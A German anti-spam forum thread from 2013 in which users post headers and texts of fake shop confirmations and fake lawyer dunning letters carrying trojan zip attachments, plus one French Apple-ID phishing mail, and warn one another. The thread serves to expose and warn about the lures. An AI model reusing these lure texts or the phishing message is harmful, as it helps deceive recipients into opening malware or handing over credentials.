X-Attachment: 815_TKG.zip#357800017|>113_TKG.PDF.exe Virus: Win32:Filename-A [Susp] Deleted

Mittwoch
18.03.2013, 17:48
Heute schlug eine Bestätigung bei mir auf, die vermeintlich von hotel.de kommt:

Return-Path: <slobfu92 [at] hotel.de>
Delivery-Date: Mon, 18 Mar 2013 15:33:53 +0100
Received-SPF: fail (mxeu1: domain of hotel.de does not designate 213.161.158.74 as permitted sender) client-ip=213.161.158.74; envelope-from=slobfu92 [at] hotel.de; helo=85.96.44.64.dynamic.ttnet.com.tr;
Received: from 85.96.44.64.dynamic.ttnet.com.tr ([213.161.158.74])
by mx.kundenserver.de (node=mxeu1) with ESMTP (Nemesis)
id *** for blah [at] blubb.tld; Mon, 18 Mar 2013 15:33:53 +0100
Return-Path: <Reserv [at] hotel.de>
Received: from unknown (HELO prodmail.hotel.de) (216.82.255.50)
by mail1.bemta7.messagelabs.com with SMTP; Mon, 18 Mar 2013 16:33:46 +0200
Received: from ([127.0.0.1]) with MailEnable ESMTP; Mon, 18 Mar 2013 16:33:46 +0200
MIME-Version: 1.0
From: "hotel.de" <Reserv [at] hotel.de>
Date: Mon, 18 Mar 2013 16:33:46 +0200
Subject: Hotel.de Reservierung [42938447], Mon, 18 Mar 2013 16:33:46 +0200
Wie man am SPF-Fail sieht, ist die Mail über einen Dialin-Account in der Türkei abgekippt worden. Entweder Botnetz oder ein türkisches Spamnetzwerk.




Reservierung


Buchungsnummer: 6O9679512
Buchungsdatum: Mon, 18 Mar 2013 16:33:46 +0200
Mehr Details in der beigefugten Datei

Anreise: 23.03.2013 Anzahl Nächte: 1
Abreise: 24.03.2013 Gesamtanzahl Personen: 1
Preis: 17,42 EUR
Der Gesamtpreis beinhaltet 5,11 EUR Steuern und Abgaben.

Hinweis: Diese Buchung ist per Bankkarte gesichert.
--------------------------------------------------------------------------------
Mit freundlichen grüßen
Ihr hotel.de/hotel.info-Team
hotel.de AG - www.hotel.de - www.hotel.info
Im Anhang findet sich eine "HotelReservierung1608784.pdf.zip", die laut Virus Total erwartungsgemäß ziemlich verseucht ist (https://www.virustotal.com/de/file/ec3d76d39cac9a53f63a559861e0bb182e7346e775535313d2a262738743da5f/analysis/). Also: Finger weg!

MeinerEiner
18.03.2013, 19:58
Amazon wird auch schon fleißig Missbraucht dort ist es der Medionshop

Johannes
22.03.2013, 14:33
From: - Fri Mar 22 14:25:17 2013
X-Account-Key: account12
X-UIDL: 28a5bb47adc30e3b4d310cf7e26e4a26
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
X-Envelope-From: <service [at] baur.de>
X-Envelope-To: <ich [at] xyz-online.de>
X-Delivery-Time: 1363958704
X-UID: 5679
Return-Path: <service [at] baur.de>
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: mi
Received: from 01-ah-r29u13-ss44.alphahosting.com (web.server.MX.relay.75.127.110.44-static.reverse.yourdnshost.com [75.127.110.44]) by mailin.rzone.de (jored mi88) (RZmta 31.22 OK) with SMTP id 606c21p2MDM3yS for <ich [at] xyz-online.de>; Fri, 22 Mar 2013 14:25:02 +0100 (CET)
Received: from qmuamjl (179.121.178.138) by 01-ah-r29u13-ss44.alphahosting.com; Fri, 22 Mar 2013 09:25:02 -0400
Message-ID: <009901c49eb6$b3da0e08$408c594b [at] qmuamjl>
Reply-To: <fashion-beratung [at] baur.de>
From: <service [at] baur.de>
To: <ich [at] xyz-online.de>
Subject: Möbel kaufen BAUR Versand
Date: Fri, 22 Mar 2013 09:25:02 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_009E_01C4594B.408C0E08"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165


п»їSehr geehrte Kundin! Sehr geehrter Kunde!



Vielen Dank fГјr Ihren Einkauf bei Baur Versand. NГ¤hereВ InformationenВ zuВ IhrerВ BestellungВ findenВ SieВ imВ Anhang.В



Mit freundlichen GrГјГџen

Baur Versand



-----------------------------

Baur Versand (GmbH & Co KG)

Bestellservice

96222 Burgkunstadt

Im Anhang: "Bestellung.zip"

Über amerikanischen Server 75.127.110.44

kjz1
03.04.2013, 22:41
Jetzt als 'Esprit', man beachte die verkorksten Umlaute, scheint dieselbe Bande zu sein:

Received: from server.azhostinq.info (pro1524.startdedicated.com
[188.138.92.56])
by mx.kundenserver.de (node=mxeu3) with ESMTP (Nemesis)
id 0LfT4v-1UzDQM3Dhp-00oivB for xxxxx; Wed, 03 Apr 2013
21:07:04 +0200
Received: from fozpz (95.168.91.95)
by server.azhostinq.info; Thu, 4 Apr 2013 00:06:35 +0500

IP: 188.138.92.56 ---> Plusserver, DE


п»їп»їSehr geehrte Kundin! Sehr geehrter Kunde!

vielen Dank fГјr Ihre Bestellung im Esprit Online Shop. Ihr Auftrag
bleibt 3 Tage fГјr Sie reserviert!


Sie können das Dokument als Zip-Datei ohne Bedenken öffnen und wenn
Sie möchten jederzeit ausdrucken.

Herzliche GrГјГџe,
Ihr Esprit Team
__________________________________________________________________________
Esprit Retail B.V. & Co. KG
Esprit Allee
40882 Ratingen
Deutschland

im Anhang dann: Bestellbestдtigung_032013.zip

der natürlich noch wenig erkannt wird:

http://virusscan.jotti.org/de/scanresult/3fa3e7288d50133debac4504309ba1a64e6024c6/af5a6935a1aefd3e60b30caacbb5ecff1fb140e1

Lachsy
06.04.2013, 17:35
Hier kommt eine angebliche Rechung von Otto-versand

Return-Path: <xxxxxx>
Received: from mail.punktnet.net ([87.193.188.203]) by mailin53.aul.t-online.de
with esmtp id 1UOTx2-0W9tcu0; Sat, 6 Apr 2013 16:18:40 +0200
Received: from User (UnknownHost [195.243.135.194]) by mail.punktnet.net with SMTP;
Sat, 6 Apr 2013 08:56:12 +0200
Reply-To: <otto.de [at] e-mail.ua>
From: "xxxxxxx>
Subject: Gezahlt Rechnungseingang/Paid Invoice Receipt.
Date: Sat, 6 Apr 2013 08:56:21 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_007E_01C2A9A6.615FAB18"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-TOI-SPAM: u;0;2013-04-06T14:18:53Z
X-TOI-VIRUSSCAN: unchecked
X-TOI-MSGID: 2e668d1d-63c1-43e9-a5a4-7897e230fd8e
X-Seen: false
X-ENVELOPE-TO: <xxxxxxx>


Sehr geehrter Kunde,

Wir haben Ihre Zahlung erhalten, und es wurde von uns bestдtigt wurde, bitten wir Sie downloaden und цffnen Sie die Gezahlt Rechnungseingang mit dieser Nachricht angehдngt.

Ihre Bestellung wird auf dem Weg zu Ihnen Haustьr bald.

Danke,

Kundendienst.

geblockt wird eine : paid invoice receipt.exe

Katzina
13.05.2013, 20:58
....und wieder eine Mahnung mit "zip-Anhang":

Absender:
From: clarc5 [at] web.de
Received: from mout-xforward.web.de ([82.165.159.3]) by mx-ha.web.de (mxweb106) with ESMTP (Nemesis) id 0MgdOF-1UqvX32nqB-00O0YJ


Sehr geehrte/r....

leider haben Sie auf unsere Forderung bis jetzt weder durch Zahlung noch durch eine Erklärung für das Ausbleiben dieser, reagiert.

Dies ist ein gesetzlicher Vertragsbruch Ihrerseits. Nach geltendem Recht könnten wir die offene Forderung bereits jetzt bei Gericht erzwingen. Wir schenken Ihnen trotzdem noch eine letzte Möglichkeit, Ihre vertragliche Verpflichtung zu erfüllen, indem Sie unverzüglich die ausstehende Summe in Höhe von 788,00 Euro an uns zur Zahlung bringen. Die Kontodaten sind in der beigefügten Rechnung.

Kundenservice [at] bonprix.de
Fon 0180 4845 / 59
www.bonprix.de

Geschäftsführer D*** L***
Ust-IdNr. DE 1066375881

Leider ist es mir noch nicht gelungen, den Header so schön zu analysieren.
LG

ute
18.05.2013, 10:09
Moin,

der Name der Firma Elektroshop Wagner in 35423 Lich wird von den Rechnungs-Verteilern (Trojaner im ZIP-Anhang zur E-Mail) offensichtlich ganz massiv mißbraucht, siehe Impressum der Firma Wagner:



Wichtiger Hinweis: Spam-Mails im Namen von Elektroshop Wagner

Sie haben eine E-Mail im Namen von Elektroshop Wagner bekommen und die dort erwähnte Bestellung nicht getätigt? Wir können Sie beruhigen: Diese E-Mail stammt nicht von uns und Sie bekommen weder eine unerwünschte Lieferung, noch müssen Sie fälschlicherweise eine Rechnung begleichen. Bei diesen E-Mails handelt es sich um Spam E-Mails, die unseren guten Namen missbrauchen.
Quelle: http://www.elektroshopwagner.de/

blizzy
12.06.2013, 08:04
return-Path: <daniel1971 [at] online.de>
Received: from mailin52.aul.t-online.de ([172.20.27.1])
by ehead410.aul.t-online.de (Dovecot) with LMTP id LGFcDSZYt1FAYwAAWcBitw;
Tue, 11 Jun 2013 20:11:35 +0200
Received: from moutng.kundenserver.de ([212.227.126.171]) by mailin52.aul.t-online.de
with esmtp id 1UmT2b-1qaRZQ0; Tue, 11 Jun 2013 20:11:33 +0200
Received: from Edmund-PC (ppp-82-135-93-195.dynamic.mnet-online.de [82.135.93.195])
by mrelayeu.kundenserver.de (node=mrbap2) with ESMTP (Nemesis)
id 0MNvNj-1UjSEf26jj-007Dg5; Tue, 11 Jun 2013 20:11:33 +0200
From: "Marvin Hartmann Anwaltschaft" <daniel1971 [at] online.de>
To: "meine Adresse"
Subject: Mein Name Ihre Rechnung von Rechtsanwalt Mandantschaft
Date: Tue, 11 Jun 2013 18:11:19 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC255C3C62"
Message-Id: <0MNvNj-1UjSEf26jj-007Dg5 [at] mrelayeu.kundenserver.de>
X-Provags-ID: V02:K0:jM5Krk/6m1JwwO7rw6xTgqoOxKmzg6ViIyvXLEQPAN/
k/B8zOIqzeRVhwvuL4dGYRzj0VoV4wi09PLUivF7Jr6pnRfE/5
irpJ2yRsKYrtP3R2BWtdKsLAGGK9NYK2Q3+jb9GNdWsqd4Sk6n
aInxqk4i1y88Ck7q0ZnI+Eiu7Ta6muiE0kn/E2Bb844YEz414D
vp4N6duPICgoaTJRVjDKBLsNHQwOllBmEaSm1+guYRn83x+qEQ
dlaJxhx5yagjerNyX5aWlHruWdbT7INS7H3QKbBUlJ+DtQO37N
6ImVmhamlteaJT9Iw1bFZxmMGvOon0gsb1sjZPm1rMwLtBj6Vi
gftMAzvP7N6Qznhn34T+w45NyjXZkL/cBrv6ZNoJJ
X-TOI-SPAM: n;1;2013-06-11T18:11:35Z
X-TOI-VIRUSSCAN: clean
X-TOI-EXPURGATEID: 149288::1370974293-0000116B-4108E129/0-0/0-7
X-TOI-SPAMCLASS: DANGEROUS, VIRUS
X-TOI-MSGID: 2fcce49e-8584-49dc-a329-d638152297ac
X-Seen: false
X-ENVELOPE-TO: <meine Adresse>



Verehrte/r mein Name,

wir wurden von Comtech Shop GmbH beauftragt die finanziellen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde notariell schriftlich zugesichert.

Mit dem ausgeführtem Auftrag vom 22.05.2013 haben Sie sich gesetzlich verpflichtet die Summe von 728,00 Euro an unseren Mandanten zu begleichen. Dem sind Sie bis jetzt nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges verpflichtet die Ausgaben unserer Beauftragung zu tragen.

Diese ergeben sich gemäß folgender Abrechnung:

EUR 16,00 (nach Nr. 222 RGV}
EUR 18,00 (Vergütung gemäß § 4 Abs. 1 und 2 RVG}

Wir verpflichten Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Bankkonto unseren Mandanten zu überweisen. Die Kontodaten und die Einzelheiten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine letzte Zeitfrist bis zum 17.062013.

Das Einhalten dieser Pflicht liegt auch in Ihrem Interesse. Falls Sie diese Frist fruchtlos verstreichen, werden ohne weitere Aufforderung gerichtliche Schritte einleitet. Dadurch werden Ihnen weitere, erhebliche Kosten entstehen.

Mit freundliche Grüßen Marvin Hartmann Anwaltschaft



Dazu ein gezippter Anhang. Mit freundliche Grüßen... Die Zeitfrist werde ich einhalten und im Jahr 62013 den Betrag inklusive Zinsen zahlen.

Solli
12.06.2013, 08:05
Ich weiß, "Mahnungen" mit Zip im Anhang sind ein alter Hut. Diese hier hat mich aber doch etwas verwirrt, da ich mit vollem Namen angesprochen werde:

Return-Path: <uwe.link-privat [at] t-online.de>
Received: from [194.25.134.83] (helo=mailout07.t-online.de)
by *
(envelope-from <uwe.link-privat [at] t-online.de>)
for *; Tue, 11 Jun 2013 17:58:06 +0200
Received: from fwd08.aul.t-online.de (fwd08.aul.t-online.de )
by mailout07.t-online.de with smtp
id 1UmQxR-0001e9-KA; Tue, 11 Jun 2013 17:58:05 +0200
Received: from test-PC (ZSbMmqZr8hqR0j0nZyY-35asNjouqmVVywaxvb7+4G6JHrf-LrGLl8JAjsP0j2IZLf@[78.55.196.9]) by fwd08.t-online.de
with esmtp id 1UmQxA-0VRLhg0; Tue, 11 Jun 2013 17:57:48 +0200
From: "Finja Hofmann Inkasso Anwaltschaft" <uwe.link-privat [at] t-online.de>
To: *
Subject: [Mein Name] Ihre Aufforderung von Anwaltschaft Mandantschaft
Date: Tue, 11 Jun 2013 15:57:49 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Content-Type: multipart/mixed; boundary="=-XC02717EC8"
Message-ID: <1UmQxA-0VRLhg0 [at] fwd08.t-online.de>


Sehr geehrte/r [Mein Name],

wir wurden von Buch Online GmbH beauftragt die gesetzlichen Interessen zu vertreten. Die Bevollmächtigung wurde notariell schriftlich zugesichert

Mit dem abgeschlossenem Vertrag vom 07.04.2013 haben Sie sich vertraglich verpflichtet den Betrag von 192,00 Euro an unseren Mandanten zu begleichen. Dieser Pflicht sind Sie bis heute nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Ausgaben unserer Beauftragung zu tragen. [...]

Im Anhang ist eine Zip-Datei, die auch meinen Namen im Dateinamen enthält. Darin befindet sich eine .com-Datei mit einem Trojaner.

blizzy
12.06.2013, 08:11
Ich weiß, "Mahnungen" mit Zip im Anhang sind ein alter Hut. Diese hier hat mich aber doch etwas verwirrt, da ich mit vollem Namen angesprochen werde:

Im Anhang ist eine Zip-Datei, die auch meinen Namen im Dateinamen enthält. Darin befindet sich eine .com-Datei mit einem Trojaner.


War bei mir auch der Fall. Die Mailadresse habe ich bei einigen Online-Shops verwendet. Welcher von denen undicht ist und Pampers braucht, läßt sich im Nachhinein nicht feststellen. Ich werde aber dazu übergehen, für jeden Shop eine eigene Mailadresse zu verwenden.

Timo1983
13.06.2013, 20:25
Sehr geehrter Kunde,

mit dem abgeschlossenem Vertrag vom 18.05.2013 haben Sie sich gesetzlich verpflichtet die Summe von 437,00 Euro an unseren Mandanten zu begleichen. Dieser Verpflichtung sind Sie bis heute nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges gezwungen die Kosten unserer Leistung zu tragen.

Unsere Kanzlei wurden vom Unternehmen Hse24 Shop Online GmbH beauftragt die finanziellen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde anwaltlich schriftlich zugesichert.

Diese belaufen sich nach folgender Kostenrechnung:

13,00 Euro (nach Nummer 3386 RGV)
14,00 Euro (Vergütung gemäß RVG § 4 Abs. 1 und 2)

Wir verpflichten Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Konto unseren Mandanten zu übersenden. Die Bankdaten und die Einzelheiten Ihrer Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine gesetzliche Frist bis zum 22.06.2013.

Mit freundliche Grüßen Lotta Herrmann Rechtsanwalt



Absender: hajo2009 [at] live.de

KaiHH
13.06.2013, 23:21
Das könnte sich um den schon einschlägig bekannten Trojaner / Virus im Anhang handeln...

http://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung

@Mods, evt. tackern?

Gruß
Kai

cmds
13.06.2013, 23:31
Danke für den Hinweis

Tacker weglege

Silke074
14.06.2013, 11:38
Sehr geehrter Kunde,

mit dem ausgeführtem Auftrag vom 29.04.2013 haben Sie sich vertraglich verpflichtet die Summe von 551,00 Euro an unseren Mandanten zu zahlen. Dem sind Sie bis jetzt nicht nachgekommen. Weiterhin sind Sie aus Gründen des Verzuges gezwungen die Ausgaben unserer Leistung zu tragen.

Unser Anwalt-Büro wurden vom Unternehmen Real-onlineshop Online GmbH AG beauftragt die gesetzlichen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde anwaltlich schriftlich versichert.

Diese ergeben sich nach dieser Abrechnung:

18,00 Euro (nach Nummer 5737 RGV)
8,00 Euro (Pauschalvergütung gemäß RVG § 4 Abs. 1 und 2)

Wir zwingen Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Konto unseren Mandanten zu überweisen. Die Kotonummer und die Einzelheiten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung setzten wir Ihnen eine gesetzliche letzte Frist bis zum 24.06.2013.

Mit freundliche Grüßen Raphael Horn Anwaltschaft



Absender ist info [at] bossthron.de

Tipp- und Grammatikfehler stehen so in der ursprünglichen Mail. Das Deutsch ist an manchen Stellen ein wenig holprig. Meine Mailadresse ist in diesem Fall mit einem Nickname verknüpft, den ich in einem Onlinespiel verwendet habe. Besagtes Onlinespiel hat keine kostenpflichtigen Komponenten und unter dem Nick bin ich schon seit 4 oder 5 Jahren nicht mehr dort registriert.

Wuschel_MUC
14.06.2013, 15:16
Wir zwingen Sie mit Kraft unserer Mandantschaft
Wenn der Absender echt wäre, wäre meine Antwort: na dann zwingen Sie mal schön. Eine Virenschleuder wird sich davon leider nicht beeindrucken lassen.

Wuschel

truelife
17.06.2013, 14:24
Und eine neue Runde:


Sehr geehrter Westfalia Shop Online GmbH Kunde **** ****,

mit Ihrer Bestellung vom 01.05.2013 haben Sie sich vertraglich verpflichtet die Rechnung von 745,00 Euro an Westfalia Shop Online GmbH zu zahlen.

Der Betrag ist bis jetzt nicht bei unseren Mandanten eingegangen.

Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Kosten unserer Leistung zu tragen.

Unser Anwalt-Büro wurden vom Unternehmen Westfalia Shop Online GmbH beauftragt die gesetzlichen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde anwaltlich schriftlich versichert.

Die zusätzlichen Kosten unserer Tätigkeit errechnen sich nach dieser Kostenrechnung:

****************
13,00 Euro (nach Nummer 8574 RGV)
3,00 Euro (Pauschale gemäß RVG § 4 Abs. 1 und 2)
****************

Wir zwingen Sie mit Kraft unserer Mandantschaft den gesamten Betrag auf das Konto unseren Mandanten zu übersenden. Die Kontodaten und die Lieferdaten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine letzte Frist bis zum 26.06.2013.

Mit freundliche Grüßen Dennis Arnold Rechtsanwalt


(Header liegt nicht vor, Mail wurde als Anhang weitergeleitet)

MarCop
17.06.2013, 16:53
Bei mir ist der Rotz unter dem hochtrabendem Titel "Kostenrechnung an Meiner Einer Anwaltschaft Mandantschaft Dell Online Store GmbH 17.06" auch eingeschlagen.


Return-Path: freundin1981 [at] gmx.net
Received: from mout.gmx.net ([212.227.17.22]) by mx-ha.gmx.net (mxgmx001) with ESMTP (Nemesis) id 0M9ryq-1Udbcw3u5g-00B6vb for <marco.pohle [at] gmx.de>; Mon, 17 Jun 2013 14:52:50 +0200
Received: from mailout-de.gmx.net ([10.1.76.24]) by mrigmx.server.lan (mrigmx001) with ESMTP (Nemesis) id 0MRQbm-1UvH2I2iuu-00Sfdf for <Marco.Pohle [at] gmx.de>; Mon, 17 Jun 2013 14:52:50 +0200
Received: (qmail invoked by alias); 17 Jun 2013 12:52:45 -0000
Received: from athedsl-387232.home.otenet.gr (EHLO User-PC) [79.131.64.158] by mail.gmx.net (mp024) with SMTP; 17 Jun 2013 14:52:45 +0200
X-Authenticated: #23857393
X-Provags-ID: V01U2FsdGVkX1+YKnpM4CCYdnEQmQiw6QGhXwa8aksvJ3Od7Xwzap zH6aAWyZROy1oo
From: "Jonah Weiss Rechtsanwalt" <freundin1981 [at] gmx.net>
To: "Meiner Einer" <Marco.Pohle [at] gmx.de>
Subject: Kostenrechnung an Meiner Einer Anwaltschaft Mandantschaft Dell Online Store GmbH 17.06.2013
Date: Mon, 17 Jun 2013 12:52:32 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC75B0B791"
X-Y-GMX-Trusted: 0
Envelope-To: <marco.pohle [at] gmx.de>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)




Sehr geehrter Dell Shop GmbH Kunde Meiner Einer,

mit dem Auftrag vom 26.05.2013 haben Sie sich gesetzlich verpflichtet den Betrag von 368,00 Euro an Dell Shop GmbH zu begleichen.

Die Summe ist bis jetzt nicht bei Dell Shop GmbH eingegangen.

Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Kosten unserer Leistung zu tragen.

Unsere Anwaltskanzlei wurden von Dell Shop GmbH beauftragt die gesetzlichen Interessen zu vertreten. Die ordnungsgemäße Bevollmächtigung wurde notariell schriftlich versichert.

Die zusätzlichen Kosten unserer Tätigkeit errechnen sich nach dieser Abrechnung:

########################
14,00 Euro (nach Nummer 5577 RGV)
3,00 Euro (Vergütung gemäß RVG § 4 Abs. 1 und 2)
########################

Wir zwingen Sie mit Kraft unserer Mandantschaft den gesamten Betrag auf das Bankkonto unseren Mandanten zu übersenden. Die Kotonummer und die Einzelheiten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung setzten wir Ihnen eine gesetzliche letzte Frist bis zum 24.06.2013.

Mit freundliche Grüßen Jonah Weiss Rechtsanwalt


:skull: Und dazu ne ZIP-Datei mit vermutlich ausgesprochen ekligem Inhalt. :skull:

Ich kenne weder eine Dell Shop GmbH, noch erinnere ich mich daran am 26.05.2013
überhaupt irgendwo, irgendwas und zu irgendeinem Preis beauftragt zu haben.
Und Anzeichen von Senilität wurden bei mir bisher auch nicht diagnostiziert.:D

Levitator
18.06.2013, 00:19
X-UIDL-JANA-SERVER: 0MbJsi-1V591G26Pk-00Ij8s
Return-Path: kazky [at] cablenet.com.cy
Received: from spam-fw.nic-west.cy.cablenet-as.net ([213.140.208.230]) by
mx-ha.gmx.net (mxgmx003) with ESMTP (Nemesis) id 0MbJsi-1V591G26Pk-00Ij8s for
=?utf-8?q?<me>;?= Mon, 17 Jun 2013 15:34:23 +0200
X-ASG-Debug-ID: 1371476059-05686c16ed9d9e20001-YKdEKu
Received: from mail0-nic.wavespeed.net (mail0-nic.wavespeed.net [213.140.209.232]) by spam-fw.nic-west.cy.cablenet-as.net with ESMTP id sAeFCPMxgcqCJK6V for <me>; Mon, 17 Jun 2013 16:34:19 +0300 (EEST)
X-Barracuda-Envelope-From: kazky [at] cablenet.com.cy
X-Barracuda-Apparent-Source-IP: 213.140.209.232
Received: from localhost (localhost.localdomain [127.0.0.1])
by mail0-nic.wavespeed.net (Postfix) with ESMTP id 5532A77430
for <me>; Mon, 17 Jun 2013 16:34:11 +0300 (EEST)
Received: from mail0-nic.wavespeed.net ([127.0.0.1])
by localhost (mail0-nic.wavespeed.net [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id L6h+OExxPDzx for <me>;
Mon, 17 Jun 2013 16:33:52 +0300 (EEST)
Received: from Skf-016 (dslb-084-063-225-083.pools.arcor-ip.net [84.63.225.83])
by mail0-nic.wavespeed.net (Postfix) with ESMTPSA id 2ACE577456
for <me>; Mon, 17 Jun 2013 16:33:43 +0300 (EEST)
From: "Ronja Vigt Anwaltschaft" <kazky [at] cablenet.com.cy>
To: "me>
Subject: me Ihre Inkasso Aufforderung 17.06.2013
Date: Mon, 17 Jun 2013 13:30:01 GMT
X-ASG-Orig-Subj: me Ihre Inkasso Aufforderung 17.06.2013
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XCAF48AF27"
Message-Id: <20130617133345.2ACE577456 [at] mail0-nic.wavespeed.net>
X-Barracuda-Connect: mail0-nic.wavespeed.net[213.140.209.232]
X-Barracuda-Start-Time: 1371476059
X-Barracuda-URL: http://213.140.208.230:8000/cgi-mod/mark.cgi
X-Virus-Scanned: by bsmtpd at cy.cablenet-as.net
X-Barracuda-BRTS-Status: 1
X-Barracuda-Spam-Score: 3.06
X-Barracuda-Spam-Status: No, SCORE=3.06 using global scores of TAG_LEVEL=1000.0 QUARANTINE_LEVEL=1000.0 KILL_LEVEL=7.0 tests=BSF_SC0_EXE_IN_ZIP, FORGED_MUA_OUTLOOK, MSOE_MID_WRONG_CASE
X-Barracuda-Spam-Report: Code version 3.2, rules version 3.2.2.134173
Rule breakdown below
pts rule name description
---- ---------------------- --------------------------------------------------
1.00 BSF_SC0_EXE_IN_ZIP BODY: Custom Rule BSF_SC0_EXE_IN_ZIP
0.70 MSOE_MID_WRONG_CASE MSOE_MID_WRONG_CASE
1.36 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
Envelope-To: <me>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)




Text:

Sehr geehrte/r me
mit der Bestellung vom 09.04.2013 haben Sie sich rechtlich verpflichtet die Rechnung von 640,00 Euro an Karstadt GmbH Online zu überweisen.

Dieser Pflicht sind Sie bis jetzt nicht nachgekommen.

Weiterhin sind Sie aus Gründen des Verzuges dazu verpflichtet die Ausgaben unserer Leistung zu tragen.

Unsere Anwaltskanzlei wurden von Karstadt GmbH Online beauftragt die gesetzlichen Interessen zu vertreten. Die Bevollmächtigung wurde anwaltlich zugesichert.

Die zusätzlichen Kosten unserer Beauftragung errechnen sich nach folgender Kostenrechnung:

--------------------
17,00 Euro (nach Nummer 5891 RGV)
12,00 Euro (Pauschale gemäß RVG § 4 Abs. 1 und 2)
--------------------

Wir verpflichten Sie mit Kraft unserer Mandantschaft den Gesamtbetrag auf das Konto unseren Mandanten zu übersenden. Die Kotonummer und die Lieferdaten der Bestellung finden Sie im angehängtem Ordner. Für den Eingang der Zahlung geben wir Ihnen eine gesetzliche Frist bis zum 22.06.2013.

Mit freundliche Grüßen Ronja Vigt Anwaltschaft


Sehr freundlich diese Anwaltschaft und schickt mir einen Anhang.zip mit ca 100 kb mit.
Habs in die Quarantäne verschoben, falls jemand das zip haben möchte. ;)
Mittlerweile kann ich über so einen Mist auch nicht mehr lachen.
Ich kenne einige, die aus Angst dann den Anhang öffnen, weil die Tochter oder der Sohn schon wieder mal was bestellt haben könnten.
Könnte ich mich irren oder ist der Name bewußt gewählt? Ronja *** Anwaltschaft?:D:cool:

Gruß Levy

Mittwoch
18.06.2013, 00:24
Das sind keine Mugus, da geht es darum, Dich dazu zu bewegen, den schädlingsverseuchten Anhang zu öffnen. Ich tacker' das gleich mal an den passenden Fred.

Schönen Gruß
Mittwoch

kjz1
18.06.2013, 14:31
Wieder mal mit hoher Sicherheit ein Virendownload:

Received: from mail.tarateck-hosting.de ([62.112.152.149]) by mx-ha.gmx.net
(mxgmx007) with ESMTP (Nemesis) id 0MOBBU-1UuLH42qkm-005bL6 for xxxxx; Tue, 18 Jun 2013 10:50:42 +0200
Received: by mail.tarateck-hosting.de (Postfix, from userid 1010) id 8321EE84599; Tue, 18 Jun 2013 09:59:47 +0200 (CEST)


Chérr(e) client(e)

Nous vous informons que votre compte vas s'expirée dans moins de 48
heures, il
est impérratif d'effectué une verification de vos informations dés
prérsent,
sans que votre compte sera détruit. Cliquez simplement sur le lien
ci-dessous et
ouvrer une session a l'aide de votre Apple ID et de votre mot de passe.

Vérfiez maintenat. http://vloutis.gr/dr.php

Merci, L'assistance a la clientérle Apple

IP: 85.17.123.9 ---> alpha.ideodromio.gr/Leaseweb

Spamweb mal wieder, da wundert einen gar nichts mehr...

Veltner
18.06.2013, 20:36
Achtung,Achtung!

Heute erhalten.
Sehr geehrte/r XXX,XXX

unsere Kanzlei wurden von Computeruniverse Online Store GmbH beauftragt die finanziellen Rechte zu vertreten. Die Bevollmächtigung wurde anwaltlich schriftlich versichert.

Durch die online Bestellung vom 12.04.2013 haben Sie sich vertraglich verpflichtet die Summe in Höhe von 480,00 Euro an Computeruniverse Online Store GmbH zu zahlen.

Dieser Pflicht sind Sie bis jetzt nicht nachgekommen. Weiterhin sind Sie verpflichtet die Ausgaben unserer Inanspruchnahme im vollen Umfang zu zahlen.

Wir verpflichten Sie gesetzlich den Gesamtbetrag auf das Bankkonto unseren Mandanten zu überweisen. Die Kotonummer und die Lieferdaten Ihrer Bestellung finden Sie im Anhang. Für den Eingang der Zahlung geben wir Ihnen eine gesetzliche letzte Frist bis zum 24.06.2013.

Mit freundliche Grüßen
Nelli Ziegler Inkasso Anwaltschaft

Silke074
03.07.2013, 13:01
Ich glaube ATU war noch nicht an der Reihe:


Verehrter ATU Kunde,

unsere Anwaltskanzlei wurden heute am 03.07.2013 vom Unternehmen ATU Online GmbH beauftragt Ihre finanziellen Interessen in Ihrem Fall zu schützen.

